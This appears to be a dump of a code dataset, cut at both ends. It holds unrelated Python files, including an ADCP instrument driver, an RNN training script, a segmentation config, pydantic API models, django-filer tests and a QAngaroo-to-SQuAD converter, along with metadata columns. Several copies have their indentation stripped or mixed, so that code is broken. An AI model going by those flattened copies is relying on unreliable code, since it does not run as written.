chunk,
timestamp):
return
if self._extract_sample(particles.VadcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.VadcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
elif connection == SlaveProtocol.FOURBEAM:
if self._extract_sample(particles.AdcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpSystemConfigurationDataParticle,
ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpAncillarySystemDataParticle,
ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER,
chunk,
timestamp):
return
if self._extract_sample(particles.AdcpTransmitPathParticle,
ADCP_TRANSMIT_PATH_REGEX_MATCHER,
chunk,
timestamp):
return
    def _send_break_cmd(self, delay, connection=None):
        """
        Send a BREAK to attempt to wake the device.
        @param delay break duration, forwarded to the port agent client
        @param connection connection name to send the break on
        """
        self.connections[connection].send_break(delay)
def _sync_clock(self, command, date_time_param, timeout=TIMEOUT, delay=1, time_format="%Y/%m/%d,%H:%M:%S"):
"""
Send the command to the instrument to synchronize the clock
@param command set command
@param date_time_param: date time parameter that we want to set
@param timeout: command timeout
@param delay: wakeup delay
@param time_format: time format string for set command
"""
log.info("SYNCING TIME WITH SENSOR.")
for connection in self.connections:
self._do_cmd_resp(command, date_time_param, get_timestamp_delayed("%Y/%m/%d, %H:%M:%S"),
timeout=timeout, connection=connection)
# #######################################################################
# Startup parameter handlers
########################################################################
def _get_params(self, parameters, connection):
command = NEWLINE.join(['%s?' % p for p in parameters]) + NEWLINE
if len(parameters) > 1:
regex = re.compile(r'(%s.*?%s.*?>)' % (parameters[0], parameters[-1]), re.DOTALL)
else:
regex = re.compile(r'(%s.*?>)' % parameters[0], re.DOTALL)
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._do_cmd_direct(command, connection=connection)
return self._get_response(response_regex=regex, connection=connection)
def _update_params(self, *args, **kwargs):
"""
Update the parameter dictionary.
"""
# see if we passed in a list of parameters to query
# if not, use the whole parameter list
parameters = kwargs.get('params')
if parameters is None or WorkhorseParameter.ALL in parameters:
parameters = self._param_dict.get_keys()
# filter out the engineering parameters and ALL
parameters = [p for p in parameters if not WorkhorseEngineeringParameter.has(p) and p != WorkhorseParameter.ALL]
# Get old param dict config.
old_config = self._param_dict.get_config()
if parameters:
# MASTER
master_params = [p for p in parameters if '_5th' not in p]
if master_params:
resp = self._get_params(master_params, SlaveProtocol.FOURBEAM)
self._param_dict.update_many(resp)
# SLAVE
slave_params = [p.replace('_5th', '') for p in parameters if '_5th' in p]
if slave_params:
resp = self._get_params(slave_params, SlaveProtocol.FIFTHBEAM)
self._param_dict2.update_many(resp)
for key, value in self._param_dict2.get_all().iteritems():
self._param_dict.set_value(key, value)
new_config = self._param_dict.get_config()
# Check if there is any changes. Ignore TT
if not dict_equal(new_config, old_config, ['TT']) or kwargs.get('force'):
self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
def _execute_set_params(self, commands, connection):
if commands:
# we are going to send the concatenation of all our set commands
self._linebuf[connection] = ''
self._do_cmd_direct(''.join(commands), connection=connection)
# we'll need to build a regular expression to retrieve all of the responses
# including any possible errors
if len(commands) == 1:
regex = re.compile(r'(%s.*?)\r\n>' % commands[-1].strip(), re.DOTALL)
else:
regex = re.compile(r'(%s.*?%s.*?)\r\n>' % (commands[0].strip(), commands[-1].strip()), re.DOTALL)
response = self._get_response(response_regex=regex, connection=connection)
self._parse_set_response(response[0], None)
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters
"""
self._verify_not_readonly(*args, **kwargs)
params = args[0]
changed = []
old_config = self._param_dict.get_config()
master_commands = []
slave_commands = []
for key, val in params.iteritems():
if WorkhorseEngineeringParameter.has(key):
continue
if val != old_config.get(key):
changed.append(key)
if '_5th' in key:
slave_commands.append(self._build_set_command(
WorkhorseInstrumentCommands.SET, key.replace('_5th', ''), val))
else:
master_commands.append(self._build_set_command(WorkhorseInstrumentCommands.SET, key, val))
self._execute_set_params(master_commands, connection=SlaveProtocol.FOURBEAM)
self._execute_set_params(slave_commands, connection=SlaveProtocol.FIFTHBEAM)
# Handle engineering parameters
force = False
if WorkhorseParameter.CLOCK_SYNCH_INTERVAL in params:
if (params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL] != self._param_dict.get(
WorkhorseParameter.CLOCK_SYNCH_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.CLOCK_SYNCH_INTERVAL,
params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.CLOCK_SYNCH_INTERVAL, WorkhorseScheduledJob.CLOCK_SYNC,
WorkhorseProtocolEvent.SCHEDULED_CLOCK_SYNC)
force = True
if WorkhorseParameter.GET_STATUS_INTERVAL in params:
if (params[WorkhorseParameter.GET_STATUS_INTERVAL] != self._param_dict.get(
WorkhorseParameter.GET_STATUS_INTERVAL)):
self._param_dict.set_value(WorkhorseParameter.GET_STATUS_INTERVAL,
params[WorkhorseParameter.GET_STATUS_INTERVAL])
self.start_scheduled_job(WorkhorseParameter.GET_STATUS_INTERVAL,
WorkhorseScheduledJob.GET_CONFIGURATION,
WorkhorseProtocolEvent.SCHEDULED_GET_STATUS)
force = True
self._update_params(params=changed, force=force)
return None
def _send_break(self, duration=1000, connection=None):
"""
Send a BREAK to attempt to wake the device.
"""
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_break_cmd(duration, connection=connection)
self._get_response(expected_prompt=WorkhorsePrompt.BREAK, connection=connection)
def _start_logging(self, timeout=TIMEOUT, connection=None):
"""
Command the instrument to start logging
@param timeout: how long to wait for a prompt
@throws: InstrumentProtocolException if failed to start logging
"""
try:
start = WorkhorseInstrumentCommands.START_LOGGING
# start the slave first, it collects on signal from master
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FIFTHBEAM)
self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FOURBEAM)
except InstrumentException:
self._stop_logging()
raise
def _stop_logging(self):
# stop the master first (slave only collects on signal from master)
self._send_break(connection=SlaveProtocol.FOURBEAM)
self._send_break(connection=SlaveProtocol.FIFTHBEAM)
def _discover(self, connection=None):
    """
    Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN.
    @throws InstrumentTimeoutException if the device cannot be woken.
    @throws InstrumentStateException if the device response does not correspond to
    an expected state.
    """
    states = set()
    command = WorkhorseProtocolState.COMMAND
    auto = WorkhorseProtocolState.AUTOSAMPLE
    protocol_state = command
    # Probe each connection: a successful wakeup means COMMAND; a wakeup
    # failure is taken to mean the connection is streaming (AUTOSAMPLE).
    for connection in self.connections:
        try:
            self._wakeup(3, connection=connection)
            states.add(command)
        except InstrumentException:
            states.add(auto)
    if len(states) == 1:
        # states match, return this state
        protocol_state = states.pop()
    # states don't match
    # NOTE(review): _stop_logging() runs unconditionally below, so a BREAK is
    # sent even when both connections agreed on a state (including AUTOSAMPLE,
    # whose value is still returned) — confirm this matches the driver's intent.
    self._stop_logging()
    return protocol_state
def _run_test(self, *args, **kwargs):
    """
    Run the instrument's built-in PT200 test on every connection.
    @return: newline-joined string interleaving each connection name with its test output
    """
    kwargs['timeout'] = 30
    kwargs['expected_prompt'] = WorkhorsePrompt.COMMAND
    result = []
    for connection in self.connections:
        # Label each block of test output with the connection that produced it.
        result.append(connection)
        kwargs['connection'] = connection
        result.append(self._do_cmd_resp(WorkhorseInstrumentCommands.RUN_TEST_200, *args, **kwargs))
    return NEWLINE.join(result)
@contextmanager
def _pause_logging(self):
    """Context manager: stop logging for the duration of the block, then restart it."""
    try:
        self._stop_logging()
        yield
    finally:
        # Always restart logging, even if the managed block raised.
        self._start_logging()
########################################################################
# COMMAND handlers.
########################################################################
def _handler_command_acquire_status(self, *args, **kwargs):
    """
    execute a get status
    @return next_state, (next_state, result) if successful.
    @throws InstrumentProtocolException from _do_cmd_resp.
    """
    next_state = None
    # Query both connections, then block until the full set of master and
    # slave status particles has been produced.
    super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FOURBEAM)
    super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FIFTHBEAM)
    result = self.wait_for_particles([VADCPDataParticleType.VADCP_SYSTEM_CONFIGURATION_SLAVE,
                                      VADCPDataParticleType.VADCP_COMPASS_CALIBRATION_SLAVE,
                                      VADCPDataParticleType.VADCP_ANCILLARY_SYSTEM_DATA_SLAVE,
                                      VADCPDataParticleType.VADCP_TRANSMIT_PATH_SLAVE,
                                      WorkhorseDataParticleType.ADCP_SYSTEM_CONFIGURATION,
                                      WorkhorseDataParticleType.ADCP_COMPASS_CALIBRATION,
                                      WorkhorseDataParticleType.ADCP_ANCILLARY_SYSTEM_DATA,
                                      WorkhorseDataParticleType.ADCP_TRANSMIT_PATH])
    return next_state, (next_state, result)
def _handler_command_recover_autosample(self):
    """Handle an unexpected PD0 sample seen while in COMMAND: break out of autosample."""
    log.info('PD0 sample detected in COMMAND, not allowed in VADCP. Sending break')
    self._stop_logging()
######################################################
# DIRECT_ACCESS handlers
######################################################
def _handler_direct_access_execute_direct(self, data):
    """
    Pass raw bytes straight through to the instrument (direct-access mode).
    @param data: raw command bytes from the direct-access client
    @return: (next_state, (next_state, result)) tuple; result is always empty
    """
    next_state = None
    result = []
    self._do_cmd_direct(data)
    # add sent command to list for 'echo' filtering in callback
    self._sent_cmds.append(data)
    return next_state, (next_state, result)
|
en
| 0.642129
|
The protocol needs to have 2 connections, 4Beam(Master) and 5thBeam(Slave) InstrumentDriver constructor. @param evt_callback Driver process event callback. # multiple portAgentClient Construct the driver protocol state machine. Establish communications with the device via port agent / logger and construct and initialize a protocol FSM for device interaction. @return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful. # for Master first Disconnect to the device via port agent / logger and destroy the protocol FSM. @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful. The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state. @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None). Constructs and returns a Connection object according to the given configuration. The connection object is a LoggerClient instance in this base class. Subclasses can overwrite this operation as needed. The value returned by this operation is assigned to self._connection and also to self._protocol._connection upon entering in the DriverConnectionState.CONNECTED state. @param all_configs configuration dict @returns a dictionary of Connection instances, which will be assigned to self._connection @throws InstrumentParameterException Invalid configuration. # via kwargs # via first argument # check for validity here... Note - must override if instrument driver has more than one instrument configuration. :return: list of dictionaries containing direct access configuration and commands Constructor. @param prompts Enum class containing possible device prompts used for command response logic. @param newline The device newline. @driver_event The callback for asynchronous driver events. # Construct superclass. 
# Create multiple connection versions of the pieces of protocol involving data to/from the instrument Overridden to handle multiple port agent connections # Grab time for timeout and wait for prompt. # noinspection PyArgumentList Overridden to handle multiple port agent connections # Get timeout and initialize response. # Wait for the prompt, prepare result and return, timeout exception Overridden to handle multiple port agent connections # Wakeup the device, timeout exception as needed # Clear line and prompt buffers for result, then send command. Issue an untranslated command to the instrument. No response is handled as a result of the command. @param cmd The high level command to issue # Send command. ######################################################################## # Incoming data (for parsing) callback. ######################################################################## Called by the instrument connection when data is available. Append line and prompt buffers. Also add data to the chunker and when received call got_chunk to publish results. :param connection: connection which produced this packet :param port_agent_packet: packet of data ######################################################################## # Incoming raw data callback. ######################################################################## Called by the port agent client when raw data is available, such as data sent by the driver to the instrument, the instrument responses,etc. :param connection: connection which produced this packet :param port_agent_packet: packet of data Add a chunk of data to the internal data buffers buffers implemented as lifo ring buffer :param data: bytes to add to the buffer :param connection: connection which produced this packet # Update the line and prompt buffers. # If our buffer exceeds the max allowable size then drop the leading # characters on the floor. 
# If our buffer exceeds the max allowable size then drop the leading # characters on the floor. ######################################################################## # Wakeup helpers. ######################################################################## Send a wakeup to the device. Overridden by device specific subclasses. Clear buffers and send a wakeup command to the instrument @param timeout The timeout to wake the device. @param delay The time to wait between consecutive wakeups. @throw InstrumentTimeoutException if the device could not be woken. # Clear the prompt buffer. # Grab time for timeout. # Send a line return and wait a sec. # We're going to build two complete sets of ADCP parameters here # one set for the master instrument and one for the slave # Scheduled events are handled by the master # now we're going to build a whole 'nother param dict for the slave parameters # that contain regex values so we can fill them in easily... # Scheduled events are handled by the master # ####################################################################### # Private helpers. # ####################################################################### The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample with the appropriate particle objects and REGEXes. # Only BEAM transform supported for VADCP Send a BREAK to attempt to wake the device. Send the command to the instrument to synchronize the clock @param command set command @param date_time_param: date time parameter that we want to set @param timeout: command timeout @param delay: wakeup delay @param time_format: time format string for set command # ####################################################################### # Startup parameter handlers ######################################################################## Update the parameter dictionary. 
# see if we passed in a list of parameters to query # if not, use the whole parameter list # filter out the engineering parameters and ALL # Get old param dict config. # MASTER # SLAVE # Check if there is any changes. Ignore TT # we are going to send the concatenation of all our set commands # we'll need to build a regular expression to retrieve all of the responses # including any possible errors Issue commands to the instrument to set various parameters # Handle engineering parameters Send a BREAK to attempt to wake the device. Command the instrument to start logging @param timeout: how long to wait for a prompt @throws: InstrumentProtocolException if failed to start logging # start the slave first, it collects on signal from master # stop the master first (slave only collects on signal from master) Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN. @throws InstrumentTimeoutException if the device cannot be woken. @throws InstrumentStateException if the device response does not correspond to an expected state. # states match, return this state # states don't match ######################################################################## # COMMAND handlers. ######################################################################## execute a get status @return next_state, (next_state, result) if successful. @throws InstrumentProtocolException from _do_cmd_resp. ###################################################### # DIRECT_ACCESS handlers ###################################################### # add sent command to list for 'echo' filtering in callback
| 1.229998
| 1
|
temp/rnn_interface.py
|
deepakrana47/character-predictor
| 1
|
6628493
|
import numpy as np, pickle
def sample_formation(text, seq_length, map_vect):
    """Build (input, target) training pairs from *text*.

    Each pair covers a window of seq_length characters mapped through
    *map_vect*; the target sequence is the same window shifted right by
    one character (next-character prediction).
    """
    pairs = []
    last_start = len(text) - seq_length - 1
    for start in range(last_start):
        # One extra character so the shifted target fits in the same window.
        window = text[start:start + seq_length + 1]
        inputs = [map_vect[ch] for ch in window[:-1]]
        targets = [map_vect[ch] for ch in window[1:]]
        pairs.append((inputs, targets))
    return pairs
def train(fname, rnn, map_vect):
    """
    Train a character-level RNN on the text in *fname*.
    @param fname: path to the training text file
    @param rnn: RNN class to instantiate (input size, hidden size, output size)
    @param map_vect: mapping from character to its input vector
    @return: the trained model (also saved to 'weights.pickle')
    """
    text = open(fname,'r').read()
    chars = list(set(text))
    # NOTE(review): t_size is computed but never used below.
    v_size, t_size = len(chars), len(text)
    # recurrent NN initialization: hidden layer of 250 units, rmsprop optimizer
    model = rnn(v_size, 250, v_size, optimize='rmsprop')
    # sample generation
    seq_length = 25
    samples = sample_formation(text, seq_length, map_vect)
    # RNN training parameters
    batch = 100
    miter = 20
    epoch0 = epoch = 60
    print "training start."
    while epoch > 0:
        itr = 0
        while itr < miter:
            deltaw = {}
            deltab= {}
            err = 0
            # mini-batch formation: draw `batch` random windows with replacement
            mini_batch = [samples[np.random.randint(0, len(samples))] for i in range(batch)]
            # mini-batch training: accumulate gradients over the whole batch
            while mini_batch:
                x,y = mini_batch.pop()
                model.forward_pass(x)
                dw, db, e = model.backward_pass(y)
                for j in dw:
                    if j in deltaw:
                        deltaw[j]+=dw[j]
                    else:
                        deltaw[j]=dw[j]
                for j in db:
                    if j in deltab:
                        deltab[j]+=db[j]
                    else:
                        deltab[j]=db[j]
                err += e
            # update the network with the batch-averaged gradients
            model.weight_update(model, {j:deltaw[j]/batch for j in deltaw}, {j:deltab[j]/batch for j in deltab}, neta=0.01)
            print '\t',itr,"batch error is",err/batch
            itr += 1
        print "\n %d epoch is completed\n" % (epoch0-epoch)
        epoch -= 1
    print "training complete."
    model.save_model('weights.pickle')
    return model
def test(fname, model, map_vect):
    """
    Evaluate next-character prediction accuracy of *model* on the text in *fname*.
    @param fname: path to the test text file
    @param model: trained RNN exposing forward_pass
    @param map_vect: mapping from character to its input vector
    """
    text = open(fname, 'r').read()
    # sample generation
    seq_length = 25
    samples = sample_formation(text, seq_length, map_vect)
    # setting testing parameters
    iters = 1000
    correct = 0.0
    itr = 0
    # testing of RNN
    print "\ntesting start."
    while itr < iters:
        # selecting random sample from samples (with replacement)
        x, y = samples[np.random.randint(0, len(samples))]
        # producing output
        _o = model.forward_pass(x)
        # count as correct when the final predicted character matches the target
        if np.argmax(_o[-1]) == np.argmax(y[-1]):
            correct += 1
        itr += 1
    print "\ntesting complete.\n"
    print "correct:\t",correct
    print "incorrect:\t",iters-correct
    print "\naccuracy:\t",correct/iters
|
import numpy as np, pickle
def sample_formation(text, seq_length, map_vect):
samples = []
t_size = len(text)
for i in range(0, t_size - seq_length - 1):
x = [map_vect[j] for j in text[i: i + seq_length]]
y = [map_vect[j] for j in text[i + 1: i + seq_length + 1]]
samples.append((x, y))
return samples
def train(fname, rnn, map_vect):
text = open(fname,'r').read()
chars = list(set(text))
v_size, t_size = len(chars), len(text)
# recurrent NN initalization
model = rnn(v_size, 250, v_size, optimize='rmsprop')
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# RNN training parameter
batch = 100
miter = 20
epoch0 = epoch = 60
print "training start."
while epoch > 0:
itr = 0
while itr < miter:
deltaw = {}
deltab= {}
err = 0
# mini_batch foramtion
mini_batch = [samples[np.random.randint(0, len(samples))] for i in range(batch)]
# mini_batch training
while mini_batch:
x,y = mini_batch.pop()
model.forward_pass(x)
dw, db, e = model.backward_pass(y)
for j in dw:
if j in deltaw:
deltaw[j]+=dw[j]
else:
deltaw[j]=dw[j]
for j in db:
if j in deltab:
deltab[j]+=db[j]
else:
deltab[j]=db[j]
err += e
# updating Recurrent network
model.weight_update(model, {j:deltaw[j]/batch for j in deltaw}, {j:deltab[j]/batch for j in deltab}, neta=0.01)
print '\t',itr,"batch error is",err/batch
itr += 1
print "\n %d epoch is completed\n" % (epoch0-epoch)
epoch -= 1
print "training complete."
model.save_model('weights.pickle')
return model
def test(fname, model, map_vect):
text = open(fname, 'r').read()
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# setting testing parameters
iters = 1000
correct = 0.0
itr = 0
# testing of RNN
print "\ntesting start."
while itr < iters:
# selecting random sample from samples
x, y = samples[np.random.randint(0, len(samples))]
# producing output
_o = model.forward_pass(x)
if np.argmax(_o[-1]) == np.argmax(y[-1]):
correct += 1
itr += 1
print "\ntesting complete.\n"
print "correct:\t",correct
print "incorrect:\t",iters-correct
print "\naccuracy:\t",correct/iters
|
en
| 0.597322
|
# recurrent NN initalization # sample generation # RNN training parameter # mini_batch foramtion # mini_batch training # updating Recurrent network # sample generation # setting testing parameters # testing of RNN # selecting random sample from samples # producing output
| 2.517262
| 3
|
configs/litehrnet/fcn_litehr18-without-head_512x1024_8x2_160k_cityscapes.py
|
Junjun2016/LiteHRNet
| 12
|
6628494
|
<reponame>Junjun2016/LiteHRNet
# Config composed from base fragments: FCN with a Lite-HRNet-18 backbone
# ("without head" variant), Cityscapes dataset, default runtime, and the
# 160k-iteration schedule.
_base_ = [
    '../_base_/models/fcn_litehr18-without-head.py',
    '../_base_/datasets/cityscapes.py', '../_base_/default_runtime.py',
    '../_base_/schedules/schedule_160k.py'
]
# NOTE(review): presumably needed because some backbone parameters receive no
# gradient under distributed data parallel — confirm against the model config.
find_unused_parameters = True
|
_base_ = [
'../_base_/models/fcn_litehr18-without-head.py',
'../_base_/datasets/cityscapes.py', '../_base_/default_runtime.py',
'../_base_/schedules/schedule_160k.py'
]
find_unused_parameters = True
|
none
| 1
| 1.118231
| 1
|
|
pygismeteo_base/models/search_by_coordinates.py
|
monosans/pygismeteo-base
| 2
|
6628495
|
from typing import List, Optional
from pydantic import BaseModel, Field
# Pydantic response models for the "search by coordinates" endpoint.
# Field(..., alias="nameP") maps the API's camelCase "nameP" key onto the
# snake_case attribute while keeping the field required.

class District(BaseModel):
    # District the found location belongs to.
    name: str
    name_p: str = Field(..., alias="nameP")


class SubDistrict(BaseModel):
    # Sub-district the found location belongs to.
    name: str
    name_p: str = Field(..., alias="nameP")


class Country(BaseModel):
    # Country of the found location; names may be null in the payload.
    name: Optional[str]
    code: str
    name_p: Optional[str] = Field(..., alias="nameP")


class ModelItem(BaseModel):
    # One search hit returned for the queried coordinates.
    district: Optional[District]
    id: int
    sub_district: Optional[SubDistrict]
    url: str
    name_p: Optional[str] = Field(..., alias="nameP")
    name: Optional[str]
    # Distance from the queried coordinates (units not specified here).
    distance: float
    kind: str
    country: Country


class Model(BaseModel):
    # The endpoint returns a bare JSON array, hence the __root__ list wrapper.
    __root__: List[ModelItem]
|
from typing import List, Optional
from pydantic import BaseModel, Field
class District(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class SubDistrict(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class Country(BaseModel):
name: Optional[str]
code: str
name_p: Optional[str] = Field(..., alias="nameP")
class ModelItem(BaseModel):
district: Optional[District]
id: int
sub_district: Optional[SubDistrict]
url: str
name_p: Optional[str] = Field(..., alias="nameP")
name: Optional[str]
distance: float
kind: str
country: Country
class Model(BaseModel):
__root__: List[ModelItem]
|
none
| 1
| 2.96139
| 3
|
|
tests/test_utils.py
|
messi19950304/django-file
| 889
|
6628496
|
import os
from zipfile import ZipFile
from django.conf import settings
from django.core.files import File as DjangoFile
from django.test.testcases import TestCase
from tests.helpers import create_image
from filer.utils.loader import load_object
from filer.utils.zip import unzip
# Some target classes for the classloading tests
class TestTargetSuperClass:
    # Dummy base class used only as a load_object target.
    pass


class TestTargetClass(TestTargetSuperClass):
    # Dummy subclass used only as a load_object target.
    pass


# Testing the classloader
class ClassLoaderTestCase(TestCase):
    ''' Tests filer.utils.loader.load() '''

    def test_loader_loads_strings_properly(self):
        # A dotted-path string resolves to the class object itself.
        target = 'tests.test_utils.TestTargetClass'
        result = load_object(target)  # resolves the dotted path to the class
        self.assertEqual(result, TestTargetClass)

    def test_loader_loads_class(self):
        # An instance passes through with its class preserved.
        result = load_object(TestTargetClass())
        self.assertEqual(result.__class__, TestTargetClass)

    def test_loader_loads_subclass(self):
        # A class object passes through unchanged.
        result = load_object(TestTargetClass)
        self.assertEqual(result, TestTargetClass)
# Testing the zipping/unzipping of files
class ZippingTestCase(TestCase):
    """Round-trip test: zip a generated image, then unzip it with filer's helper."""

    def setUp(self):
        # Create a real JPEG on disk and wrap it in a Django File object.
        self.img = create_image()
        self.image_name = 'test_file.jpg'
        self.filename = os.path.join(settings.FILE_UPLOAD_TEMP_DIR, self.image_name)
        self.img.save(self.filename, 'JPEG')
        self.file = DjangoFile(open(self.filename, 'rb'), name=self.image_name)
        self.zipfilename = 'test_zip.zip'
        self.zip = ZipFile(self.zipfilename, 'a')
        self.zip.write(self.filename)
        self.zip.close()

    def tearDown(self):
        # Fix: close the handle opened in setUp before removing the files.
        # It was previously leaked, which raises ResourceWarning and makes
        # os.remove fail on Windows while the file is still open.
        self.file.close()
        # Clean up the created zip file
        os.remove(self.zipfilename)
        os.remove(self.filename)

    def test_unzipping_works(self):
        result = unzip(self.zipfilename)
        self.assertEqual(result[0][0].name, self.file.name)
|
import os
from zipfile import ZipFile
from django.conf import settings
from django.core.files import File as DjangoFile
from django.test.testcases import TestCase
from tests.helpers import create_image
from filer.utils.loader import load_object
from filer.utils.zip import unzip
# Some target classes for the classloading tests
class TestTargetSuperClass:
pass
class TestTargetClass(TestTargetSuperClass):
pass
# Testing the classloader
class ClassLoaderTestCase(TestCase):
''' Tests filer.utils.loader.load() '''
def test_loader_loads_strings_properly(self):
target = 'tests.test_utils.TestTargetClass'
result = load_object(target) # Should return an instance
self.assertEqual(result, TestTargetClass)
def test_loader_loads_class(self):
result = load_object(TestTargetClass())
self.assertEqual(result.__class__, TestTargetClass)
def test_loader_loads_subclass(self):
result = load_object(TestTargetClass)
self.assertEqual(result, TestTargetClass)
# Testing the zipping/unzipping of files
class ZippingTestCase(TestCase):
def setUp(self):
self.img = create_image()
self.image_name = 'test_file.jpg'
self.filename = os.path.join(settings.FILE_UPLOAD_TEMP_DIR, self.image_name)
self.img.save(self.filename, 'JPEG')
self.file = DjangoFile(open(self.filename, 'rb'), name=self.image_name)
self.zipfilename = 'test_zip.zip'
self.zip = ZipFile(self.zipfilename, 'a')
self.zip.write(self.filename)
self.zip.close()
def tearDown(self):
# Clean up the created zip file
os.remove(self.zipfilename)
os.remove(self.filename)
def test_unzipping_works(self):
result = unzip(self.zipfilename)
self.assertEqual(result[0][0].name, self.file.name)
|
en
| 0.590469
|
# Some target classes for the classloading tests # Testing the classloader Tests filer.utils.loader.load() # Should return an instance # Testing the zipping/unzipping of files # Clean up the created zip file
| 2.481917
| 2
|
FBA_tutorials/utils/show_map.py
|
HansWesterhoff/Systems_Biology_FBA_tutorial
| 6
|
6628497
|
<gh_stars>1-10
import escher,escher.urls,json,os
from IPython.display import HTML
def show_map(sol, map_loc, color=0):
    ''' Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme.
    sol: the solution object containing the simulation results (object with a
         .fluxes attribute, or a plain dict of reaction -> flux)
    map_loc: filename of the map json
    color: color scheme to use (only scheme 0 is defined)
    '''
    if color == 0:
        colors = [{'type': 'min', 'color': '#cccccc', 'size': 5},  # grey to green to orange
                  {'type': 'mean', 'color': '#007F00', 'size': 10},
                  {'type': 'max', 'color': '#f0a900', 'size': 15}]
    else:
        print('Color scheme not defined!')
        return
    if type(sol) != dict:
        try:
            d = sol.fluxes
        except AttributeError:
            # Fix: was a bare `except:` which also swallowed KeyboardInterrupt
            # and unrelated errors; only a missing .fluxes attribute means an
            # empty solution was passed.
            print('An empty solution was passed.')
            d = {}
    else:
        d = sol  # shorthand
    d2 = {}  # rebuild with plain floats (float64 values were not updating)
    for key in d.keys():  # round to remove output like this: 1.653e-15
        d2[key] = round(float(d[key]), 6)
    network = escher.Builder(map_json=map_loc, reaction_data=d2,
                             reaction_styles=['color', 'size', 'abs', 'text'],
                             # change the default colors, blue to purple to red
                             reaction_scale=colors,
                             hide_secondary_metabolites=False, secondary_metabolite_radius=10,
                             highlight_missing=True)
    return network
|
import escher,escher.urls,json,os
from IPython.display import HTML
def show_map(sol,map_loc,color=0):
''' Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme.
sol: the solution object containing the simulation results.
map_loc: filename of the map json
color: color scheme to use
'''
if color == 0:
colors = [{'type': 'min', 'color': '#cccccc', 'size': 5},# grey to green to orange
{'type': 'mean', 'color': '#007F00', 'size': 10},
{'type': 'max', 'color': '#f0a900', 'size': 15}]
else:
print('Color scheme not defined!')
return
if type(sol) != dict:
try:
d = sol.fluxes
except:
print('An empty solution was passed.')
d = {}
else:
d = sol # shorthand
d2 = {} # for some reason my types (from float 64 to float) were not updating and with a new dictionary they do
for key in d.keys(): # remove output like this: 1.653e-15
d2[key] = round(float(d[key]),6)
network = escher.Builder(map_json=map_loc, reaction_data=d2,
reaction_styles=['color', 'size', 'abs', 'text'],
# change the default colors, blue to purple to red
reaction_scale=colors,
hide_secondary_metabolites=False,secondary_metabolite_radius=10,
highlight_missing=True)
return network
|
en
| 0.756942
|
Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme. sol: the solution object containing the simulation results. map_loc: filename of the map json color: color scheme to use # grey to green to orange # shorthand # for some reason my types (from float 64 to float) were not updating and with a new dictionary they do # remove output like this: 1.653e-15 # change the default colors, blue to purple to red
| 2.603073
| 3
|
bagpipe/exabgp/version.py
|
taheri0/MPLS-over-GRE
| 94
|
6628498
|
<reponame>taheri0/MPLS-over-GRE
version="2.0.8"
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
    import sys
    # Emit the version without a trailing newline so callers capture it verbatim.
    sys.stdout.write(version)
|
version="2.0.8"
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
|
en
| 0.985608
|
# Do not change the first line as it is parsed by scripts
| 1.167568
| 1
|
data/QAngaroo/qangaroo2squad.py
|
elyase/jack
| 192
|
6628499
|
import json
import sys
def load_json(path):
    """Read the JSON document at *path* and return the parsed object."""
    with open(path, 'r') as handle:
        return json.load(handle)
def convert2SQUAD_format(hoppy_data, write_file_name):
    """
    Converts QAngaroo data (hoppy_data) into SQuAD format.
    The SQuAD-formatted data is written to disk at write_file_name.

    All support documents of an example are joined into one lowercased
    super-document; examples whose answer never occurs in that document
    are silently dropped.
    """
    entries = []
    for example in hoppy_data:
        # Join every support document into a single lowercased super-document.
        context = " <new_doc> ".join(example['supports']).lower()
        answer_text = example['answer'].lower()
        start = context.find(answer_text)
        if start == -1:
            # Answer string absent from the supports: skip this example.
            continue
        # Build the nested SQuAD layout bottom-up (answer -> qa -> paragraph -> entry).
        qa = {
            'id': example['id'],
            'question': example['query'],
            'answers': [{'answer_start': start, 'text': answer_text}],
        }
        entries.append({
            'title': 'dummyTitle',
            'paragraphs': [{'context': context, 'qas': [qa]}],
        })
    squad_formatted_content = {'version': 'hoppy_squad_format', 'data': entries}
    with open(write_file_name, 'w') as f:
        json.dump(squad_formatted_content, f, indent=1)
    print('Done writing SQuAD-formatted data to: ', write_file_name)
def main():
    """CLI entry point: qangaroo2squad.py <input.json> <output.json>."""
    input_path = sys.argv[1]
    output_path = sys.argv[2]
    convert2SQUAD_format(load_json(input_path), output_path)

if __name__ == "__main__":
    main()
|
import json
import sys
def load_json(path):
